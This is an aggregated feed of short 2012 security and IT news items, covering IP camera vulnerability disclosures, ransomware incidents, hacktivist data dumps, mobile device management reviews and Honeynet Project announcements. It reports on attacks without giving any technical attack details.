http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3). There are two types of vulnerabilities I will be releasing today: disclosure of credentials in client-side source code and multiple XSS. [...]

==> Hacking Linksys IP Cameras (pt 3)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2). Unlike the previous two vulnerabilities I released, the vulnerabilities I’m releasing in this post are perhaps not so useful to break into the device as you need access to the admin account to exploit them. [...]

==> John McAfee to Be Released, Accuses Vice Magazine of Involvement in His Arrest

http://www.hackinthebox.org/backend.php http://www.wired.com/images_blogs/threatlevel/2012/11/mcafee-new-finke.jpg The John McAfee story continues with more drama. According to a post published on his blog, the antivirus software pioneer will be released from detention after a Guatemalan judge determined that his arrest was illegal. Furthermore, his representatives believe that he will be allowed to return to the US as he wanted. Tags: McAfee, Law and Order

==> Security Firm Identifies First Fake Installer Trojan for Macs

http://www.hackinthebox.org/backend.php http://i1-news.softpedia-static.com/images/news-700/Security-Firm-Identifies-First-Fake-Installer-Trojan-for-Macs.png?1355302240 Fake installers have been around for quite some time now, but so far, they've only targeted Windows users. Now, researchers from security firm Doctor Web have identified a variant that's designed for Mac OS X. Dubbed Trojan.SMSSend.3666, the malicious element disguises itself as an installer for a popular application called VKMusic 4, an app that allows users to listen to music on a Russian social media site. During the installation process, victims are asked to provide their mobile phone numbers. Then, they're requested to enter a code received via SMS. Tags: OS X, Apple, Viruses & Malware

==> BlackBerry 10 Gold SDKs now available for developers

http://www.hackinthebox.org/backend.php http://cdn.crackberry.com/sites/crackberry.com/files/u10880/blackberry-10-dev-alpha-31.jpg Research In Motion (RIM) (NASDAQ: RIMM)(TSX: RIM) today released the "gold" build of the BlackBerry 10 developer toolkit. The "gold" build includes all of the final tools, components, and APIs that will enable developers to create integrated, social and beautiful applications for BlackBerry 10, and have the confidence that their apps will delight customers at launch. Tags: BlackBerry, RIM, Software-Programming

==> Coming in Ubuntu Linux 13.04: instant purchases from the desktop

http://www.hackinthebox.org/backend.php http://zapt4.staticworld.net/images/article/2012/09/ubuntu20stacked20log-100005231-large.jpg Canonical may not have published an official alpha release for its core Ubuntu Linux 13.04 OS last week, or a corresponding list of new features, but on Friday the company did reveal some specifics about what's coming in this next version of its popular Linux distribution. In fact, Cristian Parrino, Canonical's vice president of online services, outlined three key new features in a post on the Canonical blog. Tags: Ubuntu, Linux

==> Intel next-gen Haswell CPU line-up leaked, Core i7-4770K the flagship

http://www.hackinthebox.org/backend.php http://www.neowin.net/images/uploaded/haswell_cpu_lineup.jpg VR-Zone has managed to get their hands on the line-up for Intel's upcoming 22nm Haswell desktop processors, revealing that there will initially be 14 CPUs across the Core i7 and Core i5 brands. These processors will be utilizing a brand new CPU socket - LGA 1150 - on Lynx Point chipset motherboards, and are split into six standard power SKUs and eight low power SKUs. Tags: Intel, Industry News

==> ISO 27001 is the litmus test for information security

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/javaconsultindo/5914569530/in/photostream With increasing reliance on collaboration tools to improve information management in regulated industries -- such as financial services, healthcare and construction -- organizations must demand the highest levels of security from their external service providers in order to avoid data breaches and other incidents. Focusing on the physical data center that hosts the online collaboration service provider's application isn't enough. Tags: Security, Industry News

==> Deploying DLP technology requires hands-on approach, experts say

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/puifonluong/6823761081/ About a year and a half ago, Mark Jackson, the information security officer at San Rafael, Calif.-based Westamerica Bank, began researching data loss prevention products for the regional community bank. His search began after a Department of Financial Institutions auditor recommended the technology as a way for Westamerica Bank to manage insider threats. Tags: Security

==> Researchers warn of bulk WordPress and Joomla exploit tool serving fake antivirus malware to users

http://www.hackinthebox.org/backend.php http://cdn.thenextweb.com/wp-content/blogs.dir/1/files/2012/12/959117_95964901-645x250.jpg WordPress and Joomla exploits have existed for years, and cybercriminals have thus been exploiting them for a long time. Yet the situation may have gotten slightly more serious as of late, as there appears to be a bulk exploit tool being used in the wild, targeting sites running both popular content management systems, and having them serve up fake antivirus malware to visitors. Tags: Security, Viruses & Malware

==> The fallacy of wireless power

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/vishay/6186787567/ They're back -- wireless chargers, that is. If you believe the hype in the product blogs and from some consulting firms, by 2016 you'll have them nearly everywhere: hotel rooms, conference rooms, airports, lobbies, cafés, and on your desks and entryway tables. I'm not so sure. Despite years of vendor attempts, the fairly old technology underneath wireless charging -- inductive charging -- has simply failed to take root in computing devices. Tags: Technology

==> Garage door opener using Siri and Raspberry Pi

http://www.hackinthebox.org/backend.php http://hackadaycom.files.wordpress.com/2012/12/screenshot-from-2012-12-11-095436.png?w=580&h=378 [DarkTherapy] wrote in to tell us about his garage door opener that works with Siri and a Raspberry Pi. It's pretty hard to find a picture that tells the story of the hack, but here you can see the PCB inside the housing of the garage door opener. He patched the grey wires into the terminal block. On the other end they connect to a relay which makes the connection. Tags: Raspberry Pi, Hardware, Apple

==> Best Gaming CPUs For The Money: December 2012

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Central_processing_unit This month we discuss two new CPUs, Intel's Core i7-3970X and AMD's Athlon II X4 651K, neither of which gamers are going to get particularly excited about. We also discuss the disappearance of the Pentium G2120, along with a handful of price changes. If you don't have the time to research benchmarks, or if you don't feel confident enough in your ability to pick the right processor for your next gaming machine, fear not. We at Tom's Hardware have come to your aid with a simple list of the best gaming CPUs offered for the money. Tags: Hardware, Games, Intel, AMD

==> Malicious QR codes pop up on traffic-heavy locations

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/QR_code Cybercrooks are putting up stickers featuring URLs embedded in Quick Response codes (QR codes) as a trick designed to drive traffic to dodgy sites. QR codes are two-dimensional matrix barcodes that can be scanned by smartphones and that link users directly to a website without having to type in its address. By using QR codes (rather than links) as a jump-off point to dodgy sites, cybercrooks can disguise the ultimate destination of links. Tags: Security

==> FTC re-slams apps for kids over privacy concerns

http://www.hackinthebox.org/backend.php http://asset3.cbsistatic.com/cnwk.1d/i/tim/2012/12/10/ftc.jpg In February 2012 the Federal Trade Commission (FTC) issued a report titled Mobile Apps for Kids: Current Privacy Disclosures are Disappointing (PDF) that pointed out that there was "little or no" privacy information available to parents in the Android Google Play and Apple iOS app stores prior to download and scarce data in the apps themselves or on the app vendors' websites. Tags: FTC, Privacy

==> GhostShell claims breach of 1.6M accounts at FBI, NASA, and more

http://www.hackinthebox.org/backend.php http://cdn-static.zdnet.com/i/story/70/00/008558/team-ghostshell-takes-on-nasa-esa-pentagon.png Hacktivist campaigners Team GhostShell claim to have stolen accounts from a number of organisations including NASA, ESA, the Pentagon and the Federal Reserve. Tags: Security, Hackers

==> Public Buses Across Country Quietly Adding Microphones to Record Passenger Conversations

http://www.hackinthebox.org/backend.php http://www.wired.com/images_blogs/threatlevel/2012/12/Transit-CCTV-camera.jpg Transit authorities in cities across the country are quietly installing microphone-enabled surveillance systems on public buses that would give them the ability to record and store private conversations, according to documents obtained by a news outlet. The systems are being installed in San Francisco, Baltimore, and other cities with funding from the Department of Homeland Security in some cases, according to the Daily, which obtained copies of contracts, procurement requests, specs and other documents. Tags: Privacy

==> 8 biggest myths about managing geeks

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/nivlek_est/319151015/ From Sheldon Cooper on "The Big Bang Theory" to Comic Book Guy from "The Simpsons" to Urkel, we know all we need to know about geeks, right? They eat nothing but pizza and care about nothing but technology. They live by night and are rarely seen in daylight. They're barely able to communicate with other bipeds. They'd spend all day playing with their toys and getting nada done if you let them. They're the antithesis of creative. Tags: Industry News

==> UK Chapter Annual Status Report 2011/2012

http://www.honeynet.org/rss.xml The UK Chapter's annual status report for 2011/2012 has been published at http://www.ukhoneynet.org/2012/12/04/uk-honeynet-project-chapter-annual-status-report-for-20112012/.

==> ENISA publishes report on honeypots

http://www.honeynet.org/rss.xml ENISA (The European Network and Information Security Agency), under the leadership of CERT Polska, has published a report on honeypots. It's a hands-on guide to the various honeypot technologies out there, looking at various operational aspects such as extensibility, reliability, ease of deployment, etc. If you are considering running a honeypot, this is a must read! Check it out at http://www.enisa.europa.eu/media/press-releases/new-report-by-eu-agency-enisa-on-digital-trap-honeypots-to-detect-cyber-attacks. Great job, ENISA!

==> Press Release: 2013 Honeynet Project Workshop

http://www.honeynet.org/rss.xml THE HONEYNET PROJECT Contact: Christian Seifert Phone: +1-206-2651944 1425 Broadway #438 Seattle, WA, 98122 FOR IMMEDIATE RELEASE 9 A.M. GST, November 26th, 2012 2013 HONEYNET PROJECT ANNUAL WORKSHOP 10-12 FEBRUARY 2013 IN DUBAI, UAE DUBAI, 26 NOV 2012: This three-day event features an exceptional collection of international security professionals presenting the latest research tools and findings in malware analysis. The twelfth annual workshop will be held at The Address Dubai Mall Hotel on the 10th through 12th of February, 2013, with sponsorship and support from the UAE Honeynet Project chapter, United Arab Emirates Computer Emergency Response Team (aeCERT), and the Pakistan Honeynet Project chapter. The workshop includes one full day of briefings and two full days of hands-on tutorial trainings. Founded in 1999, The Honeynet Project is a non-profit international research organization dedicated to improving the security of the Internet at no cost to the public. "Cyber security is a critical element for any nation working towards technical advancement," said H.E. Mohamed Nasser Al Ghanim, Director General of TRA. "I am pleased the TRA and aeCERT are participating in this event; hands-on and knowledge-intensive workshops such as this are invaluable as we work towards reinforcing the nation's cyber security." "Cyber security is not a one-man job, it is dependent on the proactive collaboration of groups spanning government, industry and academia," said Ahmad Alajail, Security Intelligence & Threat Analyst. "This is why initiatives such as Honeynet, which provide a diverse talent base, are greatly complementary to the nation's cyber security and to our work at aeCERT." The Honeynet Project is composed of 45 regional chapters and is a diverse, talented, and engaged group of hundreds of volunteer security experts who conduct open, cross-disciplinary research and development into the evolving threat landscape.
Registration and more information available at: http://dubai2013.honeynet.org or by contacting The Honeynet Project CEO Christian Seifert to request a personal interview at: christian.seifert@honeynet.org. -End-

==> 2013 Honeynet Project Workshop in Dubai!

http://www.honeynet.org/rss.xml The Honeynet Project is excited to announce its next workshop on Feb 10th to Feb 12 2013 in Dubai, UAE. This is going to be a three day event filled with presentations and hands-on tutorials by our members. We will cover a wide range of information security topics from virtualization security, botnets, big data, exploits to, of course, honeypots, that are followed by a set of exciting one-two day hands-on tutorials on security visualization, malware and network analysis, honeypots, log file assessment, and much more. The detailed agenda as well as instructions to register can be found at http://dubai2013.honeynet.org. We hope to see you in Dubai!

==> HP Annual Report 2012 released

http://www.honeynet.org/rss.xml Each year, the Honeynet Project summarizes its activities and activities of its members in a short annual report. You will find the annual report for fiscal year 2012 attached. Enjoy!

==> Honeynet Project completes Cyber Fast Track Project: Web Application Honeypots

http://www.honeynet.org/rss.xml We are happy to be able to announce the successful completion of The Honeynet Project's participation in DARPA's Cyber Fast Track program with our Web Application Honeypot project. Imperva's recent Web Application Attack Report shows the picture of large-scale automated threats towards web applications. Adversaries are basically scanning millions of web applications for vulnerabilities every day, and a single successful infection increases their army of workers and thereby their capability for doing more damage. Without a specific target, attackers can leverage automated tools and search engines' excellent information aggregation services to find their victims, identify the vulnerability, and launch an attack. The majority of web application attacks target the web application's database. These so-called SQL injection attacks manipulate the underlying database by providing user input that, due to the vulnerability in the web application, is converted into SQL statements. The main goal of this project was the development of a SQL injection vulnerability emulator that goes beyond the collection of SQL vulnerability probings. It deceives the adversary with crafted responses matching his request into sending us the malicious payload, which could include all kinds of malicious code. The project is being released as open source and installation instructions can be found on the project page. A detailed report was created as part of the project.

==> Know Your Enemy: Social Dynamics of Hacking

http://www.honeynet.org/rss.xml I am very pleased to announce the publication of another paper in our Know Your Enemy white paper series: "KYE - Social Dynamics of Hacking" authored by Thomas J. Holt and Max Kilger from our Spartan Devils Honeynet Project Chapter. In this paper, Tom and Max go to the roots of the Know Your Enemy series and shine light on the social groups that are involved in hacking.

Abstract: Though most information security research focuses on current threats, tools, and techniques to defeat attacks, it is vital to recognize and understand the humans behind attacks. Individual attackers have various skills, motives, and social relationships that shape their actions and the resources they target. In this paper we will explore the distribution of skill in the global hacker community, the influence of on- and off-line social relationships, motivations across attackers, and the near-future of threats to improve our understanding of the hacker and attacker community.

==> GSoC 2012 Accepted Students Officially Announced

http://www.honeynet.org/rss.xml Since my last post about the Google Summer Of Code 2012 Student Applications deadline closing and sharing some initial student applications statistics, all the GSoC 2012 mentoring organisations have been hard at work reviewing and scoring their student applications.

==> Google Summer Of Code 2012 Student Applications now closed and some statistics

http://www.honeynet.org/rss.xml After a slower than usual start, this year's Google Summer of Code (GSoC) student applications period closed at 19:00 UTC on Friday April 6th, with a major application rush in the last couple of days which kept us busy right up to the deadline! Many thanks to all the interested students who applied, and our mentors and org admins for taking the time to respond to students on IRC, email and through Melange.

==> Honeynet Project Security Workshop 2012 - VIDEOs posted

http://www.honeynet.org/rss.xml Folks, we had a great time at the Honeynet Project Security Workshop @ Facebook. We'd like to thank again our excellent hosts Facebook, the attendees, and our many speakers. If you were not able to attend, you can check out the videos at http://honeynet.org/SecurityWorkshops/2012_SF_Bay_Area/Mar_19/Workshop_Program_Agenda.

==> Union Pacific Opens Austin Software Development Center

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN CIO Lynden Tennison goes where the talent is to build his development team.

==> Outlook 2013: IT Is Still Too Internally Focused

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Tech spending is looking up, but IT must focus more on customers and less on internal systems.

==> San Francisco Giants' Bill Schlough: InformationWeek IT Chief Of The Year

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN The Giants' CIO and his team are innovating in areas such as analytics-based scouting and in-stadium wireless, keeping the World Series champions ahead of the game.

==> Apple Mac To Be Made In USA

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Apple shareholders may not be thrilled, but Apple's decision to make some Mac computers in the U.S. will bring more jobs, training to domestic workers.

==> In MLB.com Challenge, College Students Pitch Tech Ideas

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Major League Baseball, Syracuse University partner on hackathon to give students real-world career experience and the league new ideas to engage fans.

==> Hire A Data Science Team, Not A Data Scientist

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Assembling a group of talented people with diverse skills is the best way to meet your data science needs, says Deloitte director.

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> BYOD: Why Mobile Device Management Isn't Enough

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Here's what to look for in MDM software and what limitations IT still faces in letting employees use personal devices for work.

==> Good Technology MDM Review: Tight Grip On Data

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Good's on its way to data-centric security.

==> Symantec MDM Review: Familiarity A Selling Point

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Users of Symantec security software will find similar interface.

==> CIO Profiles: John Kellington Of Cincinnati Insurance

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Rip the Band-Aid off, advises this tech chief.

==> RIM MDM Review: Beyond BES, Not There Yet

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN It's not an easy option unless you're a heavy-duty BlackBerry shop.

==> Samsung Slammed Over Labor Abuses

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN New Samsung guidelines at China supplier factories are insufficient to protect workers, says labor watch group.

==> 10 Cloud Computing Pioneers

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Cloud computing has rewritten decades of technology rules. Take a closer look at 10 innovators who helped make it possible.

==> HP Takes $8.8 Billion Charge On Autonomy Unit

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN HP reports bruising loss for fourth quarter, says Autonomy officials misrepresented financial position prior to 2011 acquisition.

==> Big Data Classes For CXOs

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Teaching C-suite executives the fundamentals of big data, a topic once confined to the rarefied world of computer scientists, is becoming a growth industry.

==> Marketing Analytics: How To Start Without Data Scientists

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN You don't need a team of highly paid math whizzes to get started with data analytics, says one marketing analytics expert.

==> Modria's Fairness Engine: Justice On Demand

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Dispute resolution technology could replace courtroom clashes, at least when the stakes are low.

==> CIO Profiles: Anthony DeCanti Of UniGroup

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Chasing technology is a bad idea, says the CIO of this logistics services company.

==> United Flights Delayed By Computer Problems

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN One year after a merger with Continental, integrating a passenger information system causes trouble.

==> 4 Social Factors That Drive IT Buying Decisions

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN LinkedIn study finds that social networks are increasingly influential throughout the tech purchasing process.

==> Facebook Jobs App Takes On LinkedIn

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Facebook's new app is designed to connect job candidates with hiring employers. Should LinkedIn be worried?

==> Monster Chooses Splunk For Big Data Security

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Popular job search website looks to Splunk, rising big data star, to meet its online security and compliance goals.

==> E2 Innovate Keynoters: Set IT Free

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Google CIO Ben Fried evangelizes the value of employee technology choice, while IDC's Michael Fauscette sees a future in which all enterprise systems will be social.

==> McAfee Founder Sells Rights To Life Story

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Antivirus company founder remains in Guatemalan jail awaiting deportation to Belize for questioning in a murder investigation.

==> Hackers Hold Australian Medical Records Ransom

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN With no offline backups available, Australian medical center must choose: pay $4,200 ransom or attempt to do business without patient records.

==> Google's Android Malware Detection Falls Short

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Google's app verification service, introduced in Android 4.2, catches only a fifth of malware samples at best, a recent study reports.

==> Team Ghostshell Hackers Claim NASA, Interpol, Pentagon Breaches

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Group boasts "juicy release" of 1.6 million records and accounts drawn from defense contractors, government agencies, trade organizations and more.

==> Anonymous No Longer: Hacktivist Spokesman Charged

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Texas charges a self-professed Anonymous spokesman with handling stolen Stratfor credit card data; Britain convicts four people for Operation Payback DDoS attacks.

==> 6 Wacky McAfee Facts: From Guatemala, With Twists

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN You can't make up stories like the one unfolding around rogue antivirus company founder John McAfee. Catch up on the latest.

==> Citrix Buys Zenprise: What's Next In BYOD?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Citrix's acquisition signals that standalone mobile device management vendors could become less common.

==> Top 10 Malware Developments Of 2012

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Among the security game-changers this year: Blackhole's business model, Flashback's Mac fetish, ransomware's resurgence and Gauss' ability to guard against analysis.

==> Calif. Sues Delta For App Privacy Violations

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN California attorney general opens suit after Delta ignores warnings about its nonexistent app privacy policy. This may be a small part of the airline's larger technology problems.

==> Royal Security Fail: 'May I Speak To Kate?'

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN The oldest -- and most effective -- social engineering trick in the book remains getting on the phone and impersonating an insider. Ask Kate Middleton, the Duchess of Cambridge.

==> Blame Screen Size: Mobile Browsers Flunk Security Tests

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN More than 90% of mobile device browsers now in use failed safety checks, find Georgia Tech researchers.

==> Guatemala Arrests Rogue AV Founder McAfee

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN In a stream of blog posts from prison, McAfee details his arrest for immigration violations after fleeing Belize, where he's wanted for questioning in a murder investigation.

==> Swiss Spooks Warn Of Counter-Terrorism Intelligence Breach

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Swiss government suspects insider may have stolen counter-terrorism information that had been shared with Switzerland by foreign governments, including Britain and the United States.

==> Social Networks Continue Push For Control

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN The Internet was supposed to facilitate direct connections between individuals and disempower gatekeepers. Instead, it has become a massive man-in-the-middle attack.

==> 10 Financial Services Security Trends For 2013

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN DDoS attacks against major U.S. banks in September put cybersecurity back in the spotlight. Here's what the industry will do next to shore up systems.

==> RIM's BlackBerry 10 To Block Certain Passwords

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN A file uncovered in early builds of BlackBerry 10 shows a list of 106 passwords that won't be allowed on RIM's new devices.

==> Zeus Botnet Eurograbber Steals $47 Million

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Sophisticated, targeted attack campaign enabled criminals to steal an estimated $47 million from more than 30,000 corporate and private banking customers.

==> Tumblr Hack: 4 Security Reminders For SMBs

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Following GNAA's defacing of several thousand Tumblr blogs, take these security reminders to heart -- especially if you use popular publishing platforms.

==> New Rules For Bug Hunters In 2013

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Zero-day vulnerabilities market becoming more guarded as researchers increasingly limit public disclosure of their findings.

==> Better Security Through Data Mining

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Mining access logs and identity stores can provide a good picture of what's going on inside the firewall.

==> McAfee, AV King Turned Fugitive, Surfaces In Guatemala

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Geotagged photo reveals location of murder suspect John McAfee, on the run from authorities in Belize.

==> Twitter Users Vulnerable To SMS Spoofing Attack

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Twitter vulnerability would allow attackers to post messages to targeted accounts. Similar flaw has already been addressed by Facebook and SMS payment provider Venmo.

==> Centrify Harnesses Active Directory For Mobile Device Management

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN DirectControl for SaaS promises convenient single sign-on to cloud apps and services for mobile users and secure, simple deployment for IT.

==> Ransomware Pays: FBI Updates Reveton Malware Warning

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Latest malware, trying to trick users into paying a fine, claims the FBI is using audio, video, and other devices to record computer's "illegal" activity.

==> Using the cloud – UK companies unaware of their data responsibility

http://www.infosecurity-magazine.com/rss/news/ The ICO published guidance on the use of cloud services and the Data Protection Act in September of this year, but a new survey shows a worrying lack of awareness of either the ICO's guidance or legal responsibilities within British business.

==> Companies are losing control of their data to the mobile revolution

http://www.infosecurity-magazine.com/rss/news/ Users are sharing information on social networks and using public cloud services to move data from corporate to personal devices in ways that by-pass company security policies and systems, and expose company data.

==> Korean info-stealing malware targets Russian space, telecom targets

http://www.infosecurity-magazine.com/rss/news/ A new targeted information-stealing attack toward Russian entities has been found in the malware landscape. Dubbed "Sanny", it apparently originates from Korea.

==> New ransomware holds medical records with hostile encryption

http://www.infosecurity-magazine.com/rss/news/ Russian hackers may be behind a new effort that is holding an Australian medical clinic's patient records for ransom. A drive with sensitive information has been hijacked and forcibly encrypted and the attackers are demanding the oddly low price of around $4,200 to make the data available again.

==> Entry-level firewalls fall down on the job when faced with threats, volume

http://www.infosecurity-magazine.com/rss/news/ New research shows that basic firewall functionality tends to meet key performance thresholds, but entry-level products involve a level of compromise in terms of performance when advanced functionality is enabled or when the threat level surpasses a certain threshold.

==> Audio surveillance being installed on US buses

http://www.infosecurity-magazine.com/rss/news/ Concern over video and now audio recording of driver and passenger conversations on US public buses has been growing for some time. According to a report in The Daily, audio installation in transit systems, sometimes funded by the DHS, is on the increase across America.

==> 1.6 million records hacked and dumped by GhostShell

http://www.infosecurity-magazine.com/rss/news/ Hacking group Team GhostShell launches a new logo, drops 1.6 million hacked records in the name of ProjectWhiteFox (NASA, European Space Agency, Bigelow Aerospace and more), and signs off until the new year.

==> Communications Bill is overkill says parliamentary committee

http://www.infosecurity-magazine.com/rss/news/ The Joint Committee on the Draft Communications Data Bill has today published its recommendations on the UK government's draft Communications Bill: stop, rethink, engage in proper consultation and redraft for just what is necessary.

==> Kaspersky: 2012 saw billions of new attacks, especially Mac, Android

http://www.infosecurity-magazine.com/rss/news/ Web-based attacks are growing exponentially, according to Kaspersky Lab, which said that a surge in web attacks lately has resulted in it blocking more than 1.5 billion attacks and 3 billion infected files in 2012. The security firm said that it now detects 200,000 new malicious programs every day.

==> Wii U gets Homebrew hack

http://www.infosecurity-magazine.com/rss/news/ Nintendo is betting big for the holidays with the new Wii U gaming console, a connected living room hub affair that, like the Xbox 360, aims to stake out a place in the home that goes far beyond simple gaming, by offering various online video options, video chat service and more. Now, hackers have retrofitted the Wii Homebrew Channel with an update allowing it to function on the Wii U, with potential consequences for piracy.

==> Google's built-in Android app scanner fails 85% of the time

http://www.infosecurity-magazine.com/rss/news/ Android continues to be the top target for mobile malware, an issue that Google is taking steps to remedy.

==> Shamoon was an external attack on Saudi oil production

http://www.infosecurity-magazine.com/rss/news/ In its first comment on the apparent purpose behind the August Shamoon attack on Aramco, Saudi Arabia said Sunday that it was an external attack not just against Aramco, but against the Saudi economy.

==> Barrett Brown indicted for trafficking in credit card numbers

http://www.infosecurity-magazine.com/rss/news/ On 4 December a new indictment against Barrett Brown, the one-time self-proclaimed spokesman for Anonymous, says that he did knowingly traffic in more than five authentication features knowing that such features were stolen and produced without lawful authority.

==> GPU cluster can crack any NTLM 8-character hashed password in 5.5 hours

http://www.infosecurity-magazine.com/rss/news/ A cluster of 25 AMD Radeon GPUs using OpenCL and the Hashcat password recovery software is claimed to make 348 billion guesses per second against NTLM hashed passwords, and 63 billion against SHA1 hashed passwords, according to a presentation at last week's Passwords^12 conference in Oslo.

==> Escalating healthcare data breaches come with $7bn pricetag

http://www.infosecurity-magazine.com/rss/news/ Healthcare data breaches, despite their high profile in the news, aren't getting any rarer: in fact, lost or stolen devices and employee errors are heading towards a $7 billion price tag for the industry, more than the level of funding that the US government gives cancer research.

==> Cyber-attacks that kill, IPv6, and vulnerability markets on tap for 2013

http://www.infosecurity-magazine.com/rss/news/ As rough of a year as 2012 was for cybersecurity, in 2013 we will see higher stakes than ever before, researchers say. WatchGuard's security research analysts are predicting upticks in emerging cyber threats including those that can cause loss of human life.

==> Goodbye, 123456: Blackberry bans weak passwords

http://www.infosecurity-magazine.com/rss/news/ Blackberry has always had a reputation for taking particular care when it comes to security. Its enterprise-server-based deployment configuration was one of the reasons the Blackberry soared to such a high penetration rate in North America, pre-iPhone. Now, Blackberry-maker Research in Motion is tackling the consumer side of things, banning 106 passwords from being used with its devices because they are too weak.

==> New and improved SHA1 cracking method for passwords published

http://www.infosecurity-magazine.com/rss/news/ SHA1 is probably the most widely used password cryptographic hash function; but perhaps it shouldn't be. The first attack faster than brute force against SHA1 was discovered in 2005, and just over two months ago NIST declared, "Federal agencies should stop using SHA-1..."

==> More than half of IT departments don't bother with cloud vendor vetting

http://www.infosecurity-magazine.com/rss/news/ Even though the cloud and cybersecurity is at the top of the list when it comes to CIO concerns (84% of them say they are concerned about IT security breaches), less than half (45%) of companies recently surveyed said that they actually test their cloud vendors' security systems and procedures.

==> October’s Nationwide breach exposed 1.1 million Americans

